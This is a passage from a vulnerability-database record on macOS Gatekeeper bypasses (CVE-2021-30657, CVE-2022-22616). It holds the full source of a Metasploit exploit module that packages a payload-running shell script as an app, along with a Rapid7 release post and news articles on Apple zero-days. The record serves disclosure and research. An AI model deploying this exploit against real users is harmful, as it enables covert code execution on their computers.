"cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2023-08-12T03:25:44", "description": "This module exploits two CVEs that bypass Gatekeeper. For CVE-2021-30657, this module serves an OSX app (as a zip) that contains no Info.plist, which bypasses gatekeeper in macOS < 11.3. If the user visits the site on Safari, the zip file is automatically extracted, and clicking on the downloaded file will automatically launch the payload. If the user visits the site in another browser, the user must click once to unzip the app, and click again in order to execute the payload. For CVE-2022-22616, this module serves a gzip-compressed zip file with its file header pointing to the `Contents` directory which contains an OSX app. If the user downloads the file via Safari, Safari will automatically decompress the file, removing its `com.apple.quarantine` attribute. Because of this, the file will not require quarantining, bypassing Gatekeeper on MacOS versions below 12.3.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-04-26T21:59:14", "type": "metasploit", "title": "macOS Gatekeeper check bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657", "CVE-2022-22616"], "modified": "2022-04-05T15:31:51", "id": "MSF:EXPLOIT-OSX-BROWSER-OSX_GATEKEEPER_BYPASS-", "href": "https://www.rapid7.com/db/modules/exploit/osx/browser/osx_gatekeeper_bypass/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'macOS Gatekeeper check bypass',\n 'Description' => %q{\n This module exploits two CVEs that bypass Gatekeeper.\n\n For CVE-2021-30657, this module serves an OSX app (as a zip) that contains no\n Info.plist, which bypasses gatekeeper in macOS < 11.3.\n If the user visits the site on Safari, the zip file is automatically extracted,\n and clicking on the downloaded file will automatically launch the payload.\n If the user visits the site in another browser, the user must click once to unzip\n the app, and click again in order to execute the payload.\n\n For CVE-2022-22616, this module serves a gzip-compressed zip file with its file header pointing\n to the `Contents` directory which contains an OSX app. 
If the user downloads the file via Safari,\n Safari will automatically decompress the file, removing its `com.apple.quarantine` attribute.\n Because of this, the file will not require quarantining, bypassing Gatekeeper on\n MacOS versions below 12.3.\n },\n 'License' => MSF_LICENSE,\n 'Targets' => [\n [ 'macOS x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-03-25',\n 'Author' => [\n 'Cedric Owens', # CVE-2021-30657 Discovery\n 'timwr', # Module\n 'Ferdous Saljooki', # CVE-2022-22616 Discovery (@malwarezoo)\n 'Jaron Bradley', # CVE-2022-22616 Discovery (@jbradley89)\n 'Mickey Jin', # CVE-2022-22616 Discovery (@patch1t)\n 'Shelby Pace' # CVE-2022-22616 Additions\n ],\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n },\n 'References' => [\n ['CVE', '2021-30657'],\n ['CVE', '2022-22616'],\n ['URL', 'https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508'],\n ['URL', 'https://objective-see.com/blog/blog_0x64.html'],\n ['URL', 'https://jhftss.github.io/CVE-2022-22616-Gatekeeper-Bypass/'],\n ['URL', 'https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/']\n ]\n )\n )\n register_options([\n OptString.new('APP_NAME', [false, 'The application name (Default: app)', 'app']),\n OptEnum.new('CVE', [true, 'The vulnerability to exploit', 'CVE-2022-22616', ['CVE-2021-30657', 'CVE-2022-22616']])\n ])\n end\n\n def cve\n datastore['CVE']\n end\n\n def check_useragent(user_agent)\n safari_version = nil\n if user_agent =~ %r{Version/(\\d+\\.\\d+(\\.\\d+)*)\\sSafari}\n safari_version = Regexp.last_match(1)\n end\n\n if safari_version && Rex::Version.new(safari_version) < Rex::Version.new('15.4') && cve == 
'CVE-2022-22616'\n print_good(\"Safari version #{safari_version} is vulnerable\")\n return true\n end\n\n return false unless user_agent =~ /Intel Mac OS X (.*?)\\)/\n\n osx_version = Regexp.last_match(1).gsub('_', '.')\n mac_osx_version = Rex::Version.new(osx_version)\n if mac_osx_version >= Rex::Version.new('12.3')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif mac_osx_version < Rex::Version.new('10.15.6')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n else\n print_good \"macOS version #{mac_osx_version} is vulnerable\"\n return true\n end\n\n false\n end\n\n def on_request_uri(cli, request)\n user_agent = request['User-Agent']\n print_status(\"Request #{request.uri} from #{user_agent}\")\n unless check_useragent(user_agent)\n print_error 'Unexpected User-Agent'\n send_not_found(cli)\n return\n end\n\n app_name = datastore['APP_NAME'] || Rex::Text.rand_text_alpha(5)\n\n app_file_name = \"#{app_name}.zip\"\n zipped = app_zip(app_name)\n\n if cve == 'CVE-2022-22616'\n zipped = Rex::Text.gzip(zipped)\n app_file_name = \"#{app_file_name}.gz\"\n end\n\n send_response(cli, zipped, { 'Content-Type' => 'application/zip', 'Content-Disposition' => \"attachment; filename=\\\"#{app_file_name}\\\"\" })\n end\n\n def app_zip(app_name)\n case target['Arch']\n when ARCH_X64\n payload_data = Msf::Util::EXE.to_python_reflection(framework, ARCH_X64, payload.encoded, {})\n command = \"echo \\\"#{payload_data}\\\" | python & disown\"\n when ARCH_PYTHON\n command = \"echo \\\"#{payload.encoded}\\\" | python\"\n when ARCH_CMD\n command = payload.encoded\n end\n\n shell_script = <<~SCRIPT\n #!/bin/sh\n\n #{command}\n SCRIPT\n\n zip = Rex::Zip::Archive.new\n zip.add_file(\"#{app_name}.app/\", '') if cve != 'CVE-2022-22616'\n zip.add_file(\"#{app_name}.app/Contents/\", '')\n zip.add_file(\"#{app_name}.app/Contents/MacOS/\", '')\n zip.add_file(\"#{app_name}.app/Contents/MacOS/#{app_name}\", shell_script).last.attrs = 0o777\n 
zip.pack\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/osx_gatekeeper_bypass.rb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "rapid7blog": [{"lastseen": "2021-05-14T19:40:32", "description": "## Stopped at the gate?\n\n\n\n\n\nA fun new module from [timwr](<https://github.com/timwr>), taking advantage of a technique reported by [Cedric Owens](<https://twitter.com/cedowens>), is reminding everyone if there is no fence a gate will not deter us. The new module provides a quick wrapper for payloads that bypasses download origination and authorization requirements known as GateKeeper in MacOS 10.15+ to simply sidestep the gate when a user opens their gift.\n\n## Cookies are tastier if you pilfer them from the jar.\n\nRecent updates to how modules interact with cookies got a little more love baked in. This week [agalway-r7](<https://github.com/agalway-r7>) clarified the recipe a bit with documentation on various methods in the new API, and [adfoster-r7](<https://github.com/adfoster-r7>) came around and swept up any crumbs modules might leave behind.\n\n## New Module Content (2)\n\n * [macOS Gatekeeper check bypass](<https://github.com/rapid7/metasploit-framework/pull/15102>) by [Cedric Owens](<https://twitter.com/cedowens>) and [timwr](<https://github.com/timwr>), which exploits [CVE-2021-30657](<https://attackerkb.com/topics/MrqDl2L0CZ/cve-2021-30657-malicious-applications-may-bypass-gatekeeper-checks?referrer=blog>) \\- This adds the `exploit/osx/browser/osx_gatekeeper_bypass` module that exploits a vulnerability in MacOS versions `10.15` to `11.3` inclusive. The module generates an app that is missing an `Info.plist` file. 
When downloaded and executed by a user, the signed / notarization checks standard for downloaded files will be bypassed, granting code execution on the target.\n * [ExifTool DjVu ANT Perl injection](<https://github.com/rapid7/metasploit-framework/pull/15185>) by [Justin Steven](<https://github.com/justinsteven>) and [William Bowling](<https://twitter.com/wcbowling>), which exploits [CVE-2021-22204](<https://attackerkb.com/topics/QlZZE7wtri/cve-2021-22204?referrer=blog>) \\- A new module has been added which exploits CVE-2021-22204, an arbitrary Perl injection vulnerability within the DjVu module of ExifTool 7.44 to 12.23 that allows for RCE when parsing a malicious file containing a crafted DjVu ANT (Annotation) section.\n\n## Enhancements and features\n\n * [#15054](<https://github.com/rapid7/metasploit-framework/pull/15054>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Updates msfdb to work on additional platforms. Specifically Ubuntu through pg_ctlcluster, as well as existing or remote databases with the new `--connection-string` option. 
This option can be used to interact with docker PostgreSQL containers\n * [#15125](<https://github.com/rapid7/metasploit-framework/pull/15125>) from [1itt1eB0y](<https://github.com/1itt1eB0y>) \\- The `session_notifier.rb` plugin has been updated to support Gotify, allowing users to be notified of new sessions via Gotify notifications.\n * [#15158](<https://github.com/rapid7/metasploit-framework/pull/15158>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds tests for the auth brute mixin\n * [#15165](<https://github.com/rapid7/metasploit-framework/pull/15165>) from [agalway-r7](<https://github.com/agalway-r7>) \\- Adds documentation for the new cookie jar implementation which is available for http-based modules\n * [#15175](<https://github.com/rapid7/metasploit-framework/pull/15175>) from [whokilleddb](<https://github.com/whokilleddb>) \\- The `rejetto_hfs_exec` module has been updated to replace calls to the deprecated `URI.encode` function with calls to the `URI::encode_www_form_component` function. This prevents users from being shown deprecation warnings when running the module.\n\n## Bugs Fixed\n\n * [#15149](<https://github.com/rapid7/metasploit-framework/pull/15149>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an edge case where cookies left over from one module run could impact the next module run\n * [#15171](<https://github.com/rapid7/metasploit-framework/pull/15171>) from [timwr](<https://github.com/timwr>) \\- The `lib/msf/core/post/common.rb` and `lib/msf/ui/console/command_dispatcher/core.rb` libraries have been updated to properly support passing timeouts to `session.sys.process.capture_output()`, allowing users to specify timeouts when executing commands on sessions. 
Previously these options would be ignored and a default timeout of 15 seconds would be used instead.\n * [#15179](<https://github.com/rapid7/metasploit-framework/pull/15179>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- The `swagger-blocks` dependency has been marked as a default dependency for all installs, preventing cases where if a user did not install the `development` and `tests` groups, they would be unable to start the web service.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.43...6.0.44](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-05-05T09%3A27%3A49-04%3A00..2021-05-12T18%3A09%3A40-05%3A00%22>)\n * [Full diff 6.0.43...6.0.44](<https://github.com/rapid7/metasploit-framework/compare/6.0.43...6.0.44>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).\n\n * _Image credit: Steve F, CC BY-SA 2.0 <https://creativecommons.org/licenses/by-sa/2.0>, via Wikimedia Commons_", "cvss3": {}, "published": "2021-05-14T17:29:09", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22204", "CVE-2021-30657"], "modified": "2021-05-14T17:29:09", "id": "RAPID7BLOG:830105C5509FB1C4D38B114EDD71298E", "href": "https://blog.rapid7.com/2021/05/14/metasploit-wrap-up-111/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:46", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEj7hYJhrnn0mNN9DuCLUgEl6UwN03ALFOQxI2l87MfoAAkUG-o8fN1GEe9JmSvCgY37S_8Zxrhd3hf4PXlc3y8Sm4IWqACj4_zXuicR30fOVjnpXkZJCW5LUA7EsB-C8kfn7Caq6m2iA6mEOelc1sLvfOvpUh6b-ghilTR8Ew9dFEZ8QTWS80dfATQe>)\n\nApple recently fixed a security vulnerability in the macOS operating system that could be potentially exploited by a threat actor to \"trivially and reliably\" bypass a \"myriad of foundational macOS security mechanisms\" and run arbitrary code.\n\nSecurity researcher Patrick Wardle [detailed](<https://twitter.com/objective_see/status/1473741597368098819>) the discovery in a series of tweets on Thursday. 
Tracked as CVE-2021-30853 (CVSS score: 5.5), the issue relates to a scenario where a rogue macOS app may circumvent [Gatekeeper](<https://support.apple.com/guide/deployment-reference-macos/using-gatekeeper-apd02b925e38/web>) checks, which ensure that only trusted apps can be run and that they have passed an automated process called \"[app notarization](<https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution>).\"\n\nThe iPhone maker, crediting Gordon Long of Box with reporting the flaw, said it [addressed the weakness](<https://support.apple.com/en-us/HT212804>) with improved checks as part of macOS 11.6 updates officially released on September 20, 2021.\n\n\"Such bugs are often particularly impactful to everyday macOS users as they provide a means for adware and malware authors to sidestep macOS security mechanisms, \u2026mechanisms that otherwise would thwart infection attempts,\" Wardle [said](<https://objective-see.com/blog/blog_0x6A.html>) in a technical write-up of the flaw.\n\nSpecifically, the bug not only gets around Gatekeeper, but also [File Quarantine](<https://objective-see.com/blog/blog_0x64.html>) and macOS's notarization requirements, effectively allowing a seemingly innocuous PDF file to compromise the entire system simply by opening it. According to Wardle, the issue is rooted in the fact that an unsigned, non-notarized script-based application can _not_ explicitly specify an [interpreter](<https://en.wikipedia.org/wiki/Interpreter_\\(computing\\)>), resulting in a complete bypass.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEhaS7jTP3LdoYlOs3uvjlTWwVIyRTBuBZvrgH5h0BvDwkDordpF-jyEtBSuXIfZS1CLx3eNhW8bojx3D3cTVgeSQpeH4ud7VeFYHauWeKNZOCoFJu2t8lEL9z8-Q1HgxlAIMqdqqQLPuNDD_tHhwBrH19TZoN-uGIrYL81citlvxdHm_rA4EpIzUhLg>)\n\nIt's worth noting that a [shebang](<https://en.wikipedia.org/wiki/Shebang_\\(Unix\\)>) interpreter directive \u2014 e.g. 
#!/bin/sh or #!/bin/bash \u2014 is typically used to parse and interpret a shell program. But in this edge-case attack, an adversary can craft an application such that the shebang line is incorporated without providing an interpreter (i.e., #!) and still get the underlying operating system to launch the script without raising any alert.\n\nThis is so because \"macOS will (re)attempt to execute the failed ['interpreter-less' script-based app] via the shell ('/bin/sh')\" after the initial lack of success, Wardle explained.\n\nIn other words, threat actors can exploit this flaw by tricking their targets into opening a rogue app that can be camouflaged as Adobe Flash Player updates or trojanized versions of legitimate apps like Microsoft Office, which, in turn, can be delivered through a method called search poisoning where attackers artificially increase the search engine ranking of websites hosting their malware to lure potential victims.\n\nThis is not the first time flaws have been discovered in the Gatekeeper process. Earlier this April, Apple moved to quickly patch a then actively exploited zero-day flaw ([CVE-2021-30657](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>)) that could circumvent all security protections, thus permitting unapproved software to be run on Macs.\n\nThen in October, Microsoft disclosed a vulnerability dubbed \"Shrootless\" ([CVE-2021-30892](<https://thehackernews.com/2021/10/new-shrootless-bug-could-let-attackers.html>)), which could be leveraged to perform arbitrary operations, elevate privileges to root, and install rootkits on compromised devices. Apple [said](<https://support.apple.com/en-us/HT212872>) it remediated the problem with additional restrictions as part of security updates pushed on October 26, 2021.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-12-24T13:07:00", "type": "thn", "title": "Expert Details macOS Bug That Could Let Malware Bypass Gatekeeper Security", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657", "CVE-2021-30853", "CVE-2021-30892"], "modified": "2021-12-24T13:07:16", "id": "THN:30412CF0C94BB814E9BC328633580D99", "href": "https://thehackernews.com/2021/12/expert-details-macos-bug-that-could-let.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/-biV-82_eo5Q/YIflVSaffHI/AAAAAAAACYE/UQ2O048-aiIWv19Eso20FMpiiNSWFFicwCLcBGAsYHQ/s0/apple-malware.jpg>)\n\nSecurity is only as strong as the weakest link. 
As further proof of this, Apple released an update to macOS operating systems to address an actively exploited zero-day vulnerability that could circumvent all security protections, thus permitting unapproved software to run on Macs.\n\nThe macOS flaw, identified as [CVE-2021-30657](<https://support.apple.com/en-us/HT212325>), was discovered and reported to Apple by security engineer Cedric Owens on March 25, 2021.\n\n\"An unsigned, unnotarized, script-based proof of concept application [...] could trivially and reliably sidestep all of macOS's relevant security mechanisms (File Quarantine, Gatekeeper, and Notarization Requirements), even on a fully patched M1 macOS system,\" security researcher Patrick Wardle [explained](<https://objective-see.com/blog/blog_0x64.html>) in a write-up. \"Armed with such a capability macOS malware authors could (and are) returning to their proven methods of targeting and infecting macOS users.\"\n\nApple's macOS comes with a feature called [Gatekeeper](<https://support.apple.com/guide/deployment-reference-macos/using-gatekeeper-apd02b925e38/web>), which allows only [trusted apps](<https://support.apple.com/en-us/HT202491>) to be run by ensuring that the software has been signed by the App Store or by a registered developer and has cleared an automated process called \"[app notarization](<https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution>)\" that scans the software for malicious content.\n\nBut the new flaw uncovered by Owens could enable an adversary to craft a rogue application in a manner that would deceive the Gatekeeper service and get executed without triggering any security warning. 
The trickery involves packaging a malicious shell script as a \"double-clickable app\" so that the malware could be double-clicked and run like an app.\n\n\"It's an app in the sense that you can double click it and macOS views it as an app when you right click -> Get Info on the payload,\" Owens [said](<https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508>). \"Yet it's also shell script in that shell scripts are not checked by Gatekeeper even if the [quarantine](<https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html>) attribute is present.\"\n\n[](<https://thehackernews.com/images/-VJcAfeigXAU/YIflxqbcR8I/AAAAAAAACYQ/2BXHadqOI30gqgbTdpezN6aBLvMI51aJgCLcBGAsYHQ/s0/malware.jpg>)\n\n[](<https://thehackernews.com/images/-5-2DSx3g1lM/YIflwyqs9yI/AAAAAAAACYM/2zPv2m4h6H0XzaEyV_bxo63N0O1goK4BACLcBGAsYHQ/s0/macos-malware.jpg>)\n\nAccording to macOS security firm [Jamf](<https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/>), the threat actor behind [Shlayer](<https://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/>) malware has been abusing this Gatekeeper bypass vulnerability as early as January 9, 2021. Distributed via a technique called search engine poisoning or spamdexing, Shlayer accounts for almost 30% of all detections on the macOS platform, with one in ten systems encountering the adware at least once, according to [Kaspersky](<https://securelist.com/shlayer-for-macos/95724/>) statistics for 2019.\n\nThe attack works by manipulating search engine results to surface malicious links that, when clicked, redirects users to a web page that prompts users to download a seemingly benign app update for out-of-date software, which in this campaign, is a bash script designed to retrieve next-stage payloads, including Bundlore adware stealthily. 
Troublingly, this infection scheme could be leveraged to deliver more advanced threats such as surveillanceware and ransomware.\n\nIn addition to the aforementioned vulnerability, Monday's updates also address a critical flaw in WebKit Storage (tracked as CVE-2021-30661) that concerns an arbitrary code execution flaw in [iOS](<https://support.apple.com/en-us/HT212317>), [macOS](<https://support.apple.com/en-us/HT212325>), [tvOS](<https://support.apple.com/en-us/HT212323>), and [watchOS](<https://support.apple.com/en-us/HT212324>) when processing maliciously crafted web content.\n\n\"Apple is aware of a report that this issue may have been actively exploited,\" the company said in a security document, adding it addressed the use-after-free weakness with improved memory management.\n\nAside from these updates, Apple has also released [iCloud for Windows 12.3](<https://support.apple.com/en-us/HT212321>) with patches for four security issues in WebKit and WebRTC, among others, that could allow an attacker to conduct cross-site scripting (XSS) attacks (CVE-2021-1825) and corrupt kernel memory (CVE-2020-7463).\n\nUsers of Apple devices are recommended to update to the latest versions to mitigate the risk associated with the flaws.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-27T10:29:00", "type": "thn", "title": "Hackers Exploit 0-Day Gatekeeper Flaw to Attack macOS Computers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7463", "CVE-2021-1825", "CVE-2021-30657", "CVE-2021-30661"], "modified": "2021-04-28T06:42:59", "id": "THN:9F22FC342DFAFC55521FD4F7CEC7C9A3", "href": "https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:57", "description": "[](<https://thehackernews.com/images/-EY0jLibkpcU/YMgfQajFNQI/AAAAAAAAC3I/EIU5a5Wq51o-5TvSYm6aKt_vlbbskE6UACLcBGAsYHQ/s0/apple-zero-day.png>)\n\nApple on Monday shipped out-of-band security patches to address two zero-day vulnerabilities in iOS 12.5.3 that it says are being actively exploited in the wild.\n\nThe 
latest update, [iOS 12.5.4](<https://support.apple.com/en-us/HT212548>), comes with fixes for three security bugs, including a memory corruption issue in the [ASN.1 decoder](<https://en.wikipedia.org/wiki/ASN.1>) (CVE-2021-30737) and two flaws in its WebKit browser engine that could be abused to achieve remote code execution:

 * **CVE-2021-30761** - A memory corruption issue that could be exploited to gain arbitrary code execution when processing maliciously crafted web content. The flaw was addressed with improved state management.
 * **CVE-2021-30762** - A use-after-free issue that could be exploited to gain arbitrary code execution when processing maliciously crafted web content. The flaw was resolved with improved memory management.

Both CVE-2021-30761 and CVE-2021-30762 were reported to Apple anonymously, with the Cupertino-based company stating in its advisory that it's aware of reports that the vulnerabilities "may have been actively exploited." As is usually the case, Apple didn't share any specifics on the nature of the attacks, the victims that may have been targeted, or the threat actors that may be abusing them.

One thing that is evident, however, is that the active exploitation attempts were directed against owners of older devices such as iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation). The move mirrors a similar fix that Apple rolled out on May 3 to remediate a buffer overflow vulnerability (CVE-2021-30666) in WebKit targeting the same set of devices.

Along with the two aforementioned flaws, Apple has patched a total of 12 zero-days affecting iOS, iPadOS, macOS, tvOS, and watchOS since the start of the year:

 * [**CVE-2021-1782**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (Kernel) - A malicious application may be able to elevate privileges
 * [**CVE-2021-1870**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution
 * [**CVE-2021-1871**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution
 * [**CVE-2021-1879**](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>) (WebKit) - Processing maliciously crafted web content may lead to universal cross-site scripting
 * [**CVE-2021-30657**](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (System Preferences) - A malicious application may bypass Gatekeeper checks
 * [**CVE-2021-30661**](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (WebKit Storage) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [**CVE-2021-30663**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [**CVE-2021-30665**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [**CVE-2021-30666**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
 * [**CVE-2021-30713**](<https://thehackernews.com/2021/05/apple-issues-patches-to-combat-ongoing.html>) (TCC framework) - A malicious application may be able to bypass Privacy preferences

Users of Apple devices are recommended to update to the latest versions to mitigate the risk associated with the vulnerabilities.

Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-15T03:32:00", "type": "thn", "title": "Apple Issues Urgent Patches for 2 Zero-Day Flaws Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30737", "CVE-2021-30761", "CVE-2021-30762"], "modified": "2021-06-15T10:08:36", "id": "THN:0D13405795D42B516C33D8E56A44BA9D", "href": "https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:18", "description": "Apple on Monday rolled out an urgent security update for [iOS, iPadOS](<https://support.apple.com/en-us/HT212622>), and [macOS](<https://support.apple.com/en-us/HT212623>) to address a zero-day flaw that it said may have been actively exploited, making it the thirteenth such vulnerability Apple has patched since the start of this year.

The updates, which arrive less than a week after the company released iOS 14.7, iPadOS 14.7, and macOS Big Sur 11.5 to the public, fix a memory corruption issue (**CVE-2021-30807**) in the IOMobileFrameBuffer component, a kernel extension for managing the screen [framebuffer](<https://en.wikipedia.org/wiki/Framebuffer>), that could be abused to execute arbitrary code with kernel privileges.

The company said it addressed the issue with improved memory handling, noting it's "aware of a report that this issue may have been actively exploited." As is typically the case, additional details about the flaw have not been disclosed, to prevent the weaponization of the vulnerability for additional attacks.
Apple credited an anonymous researcher for discovering and reporting the vulnerability.

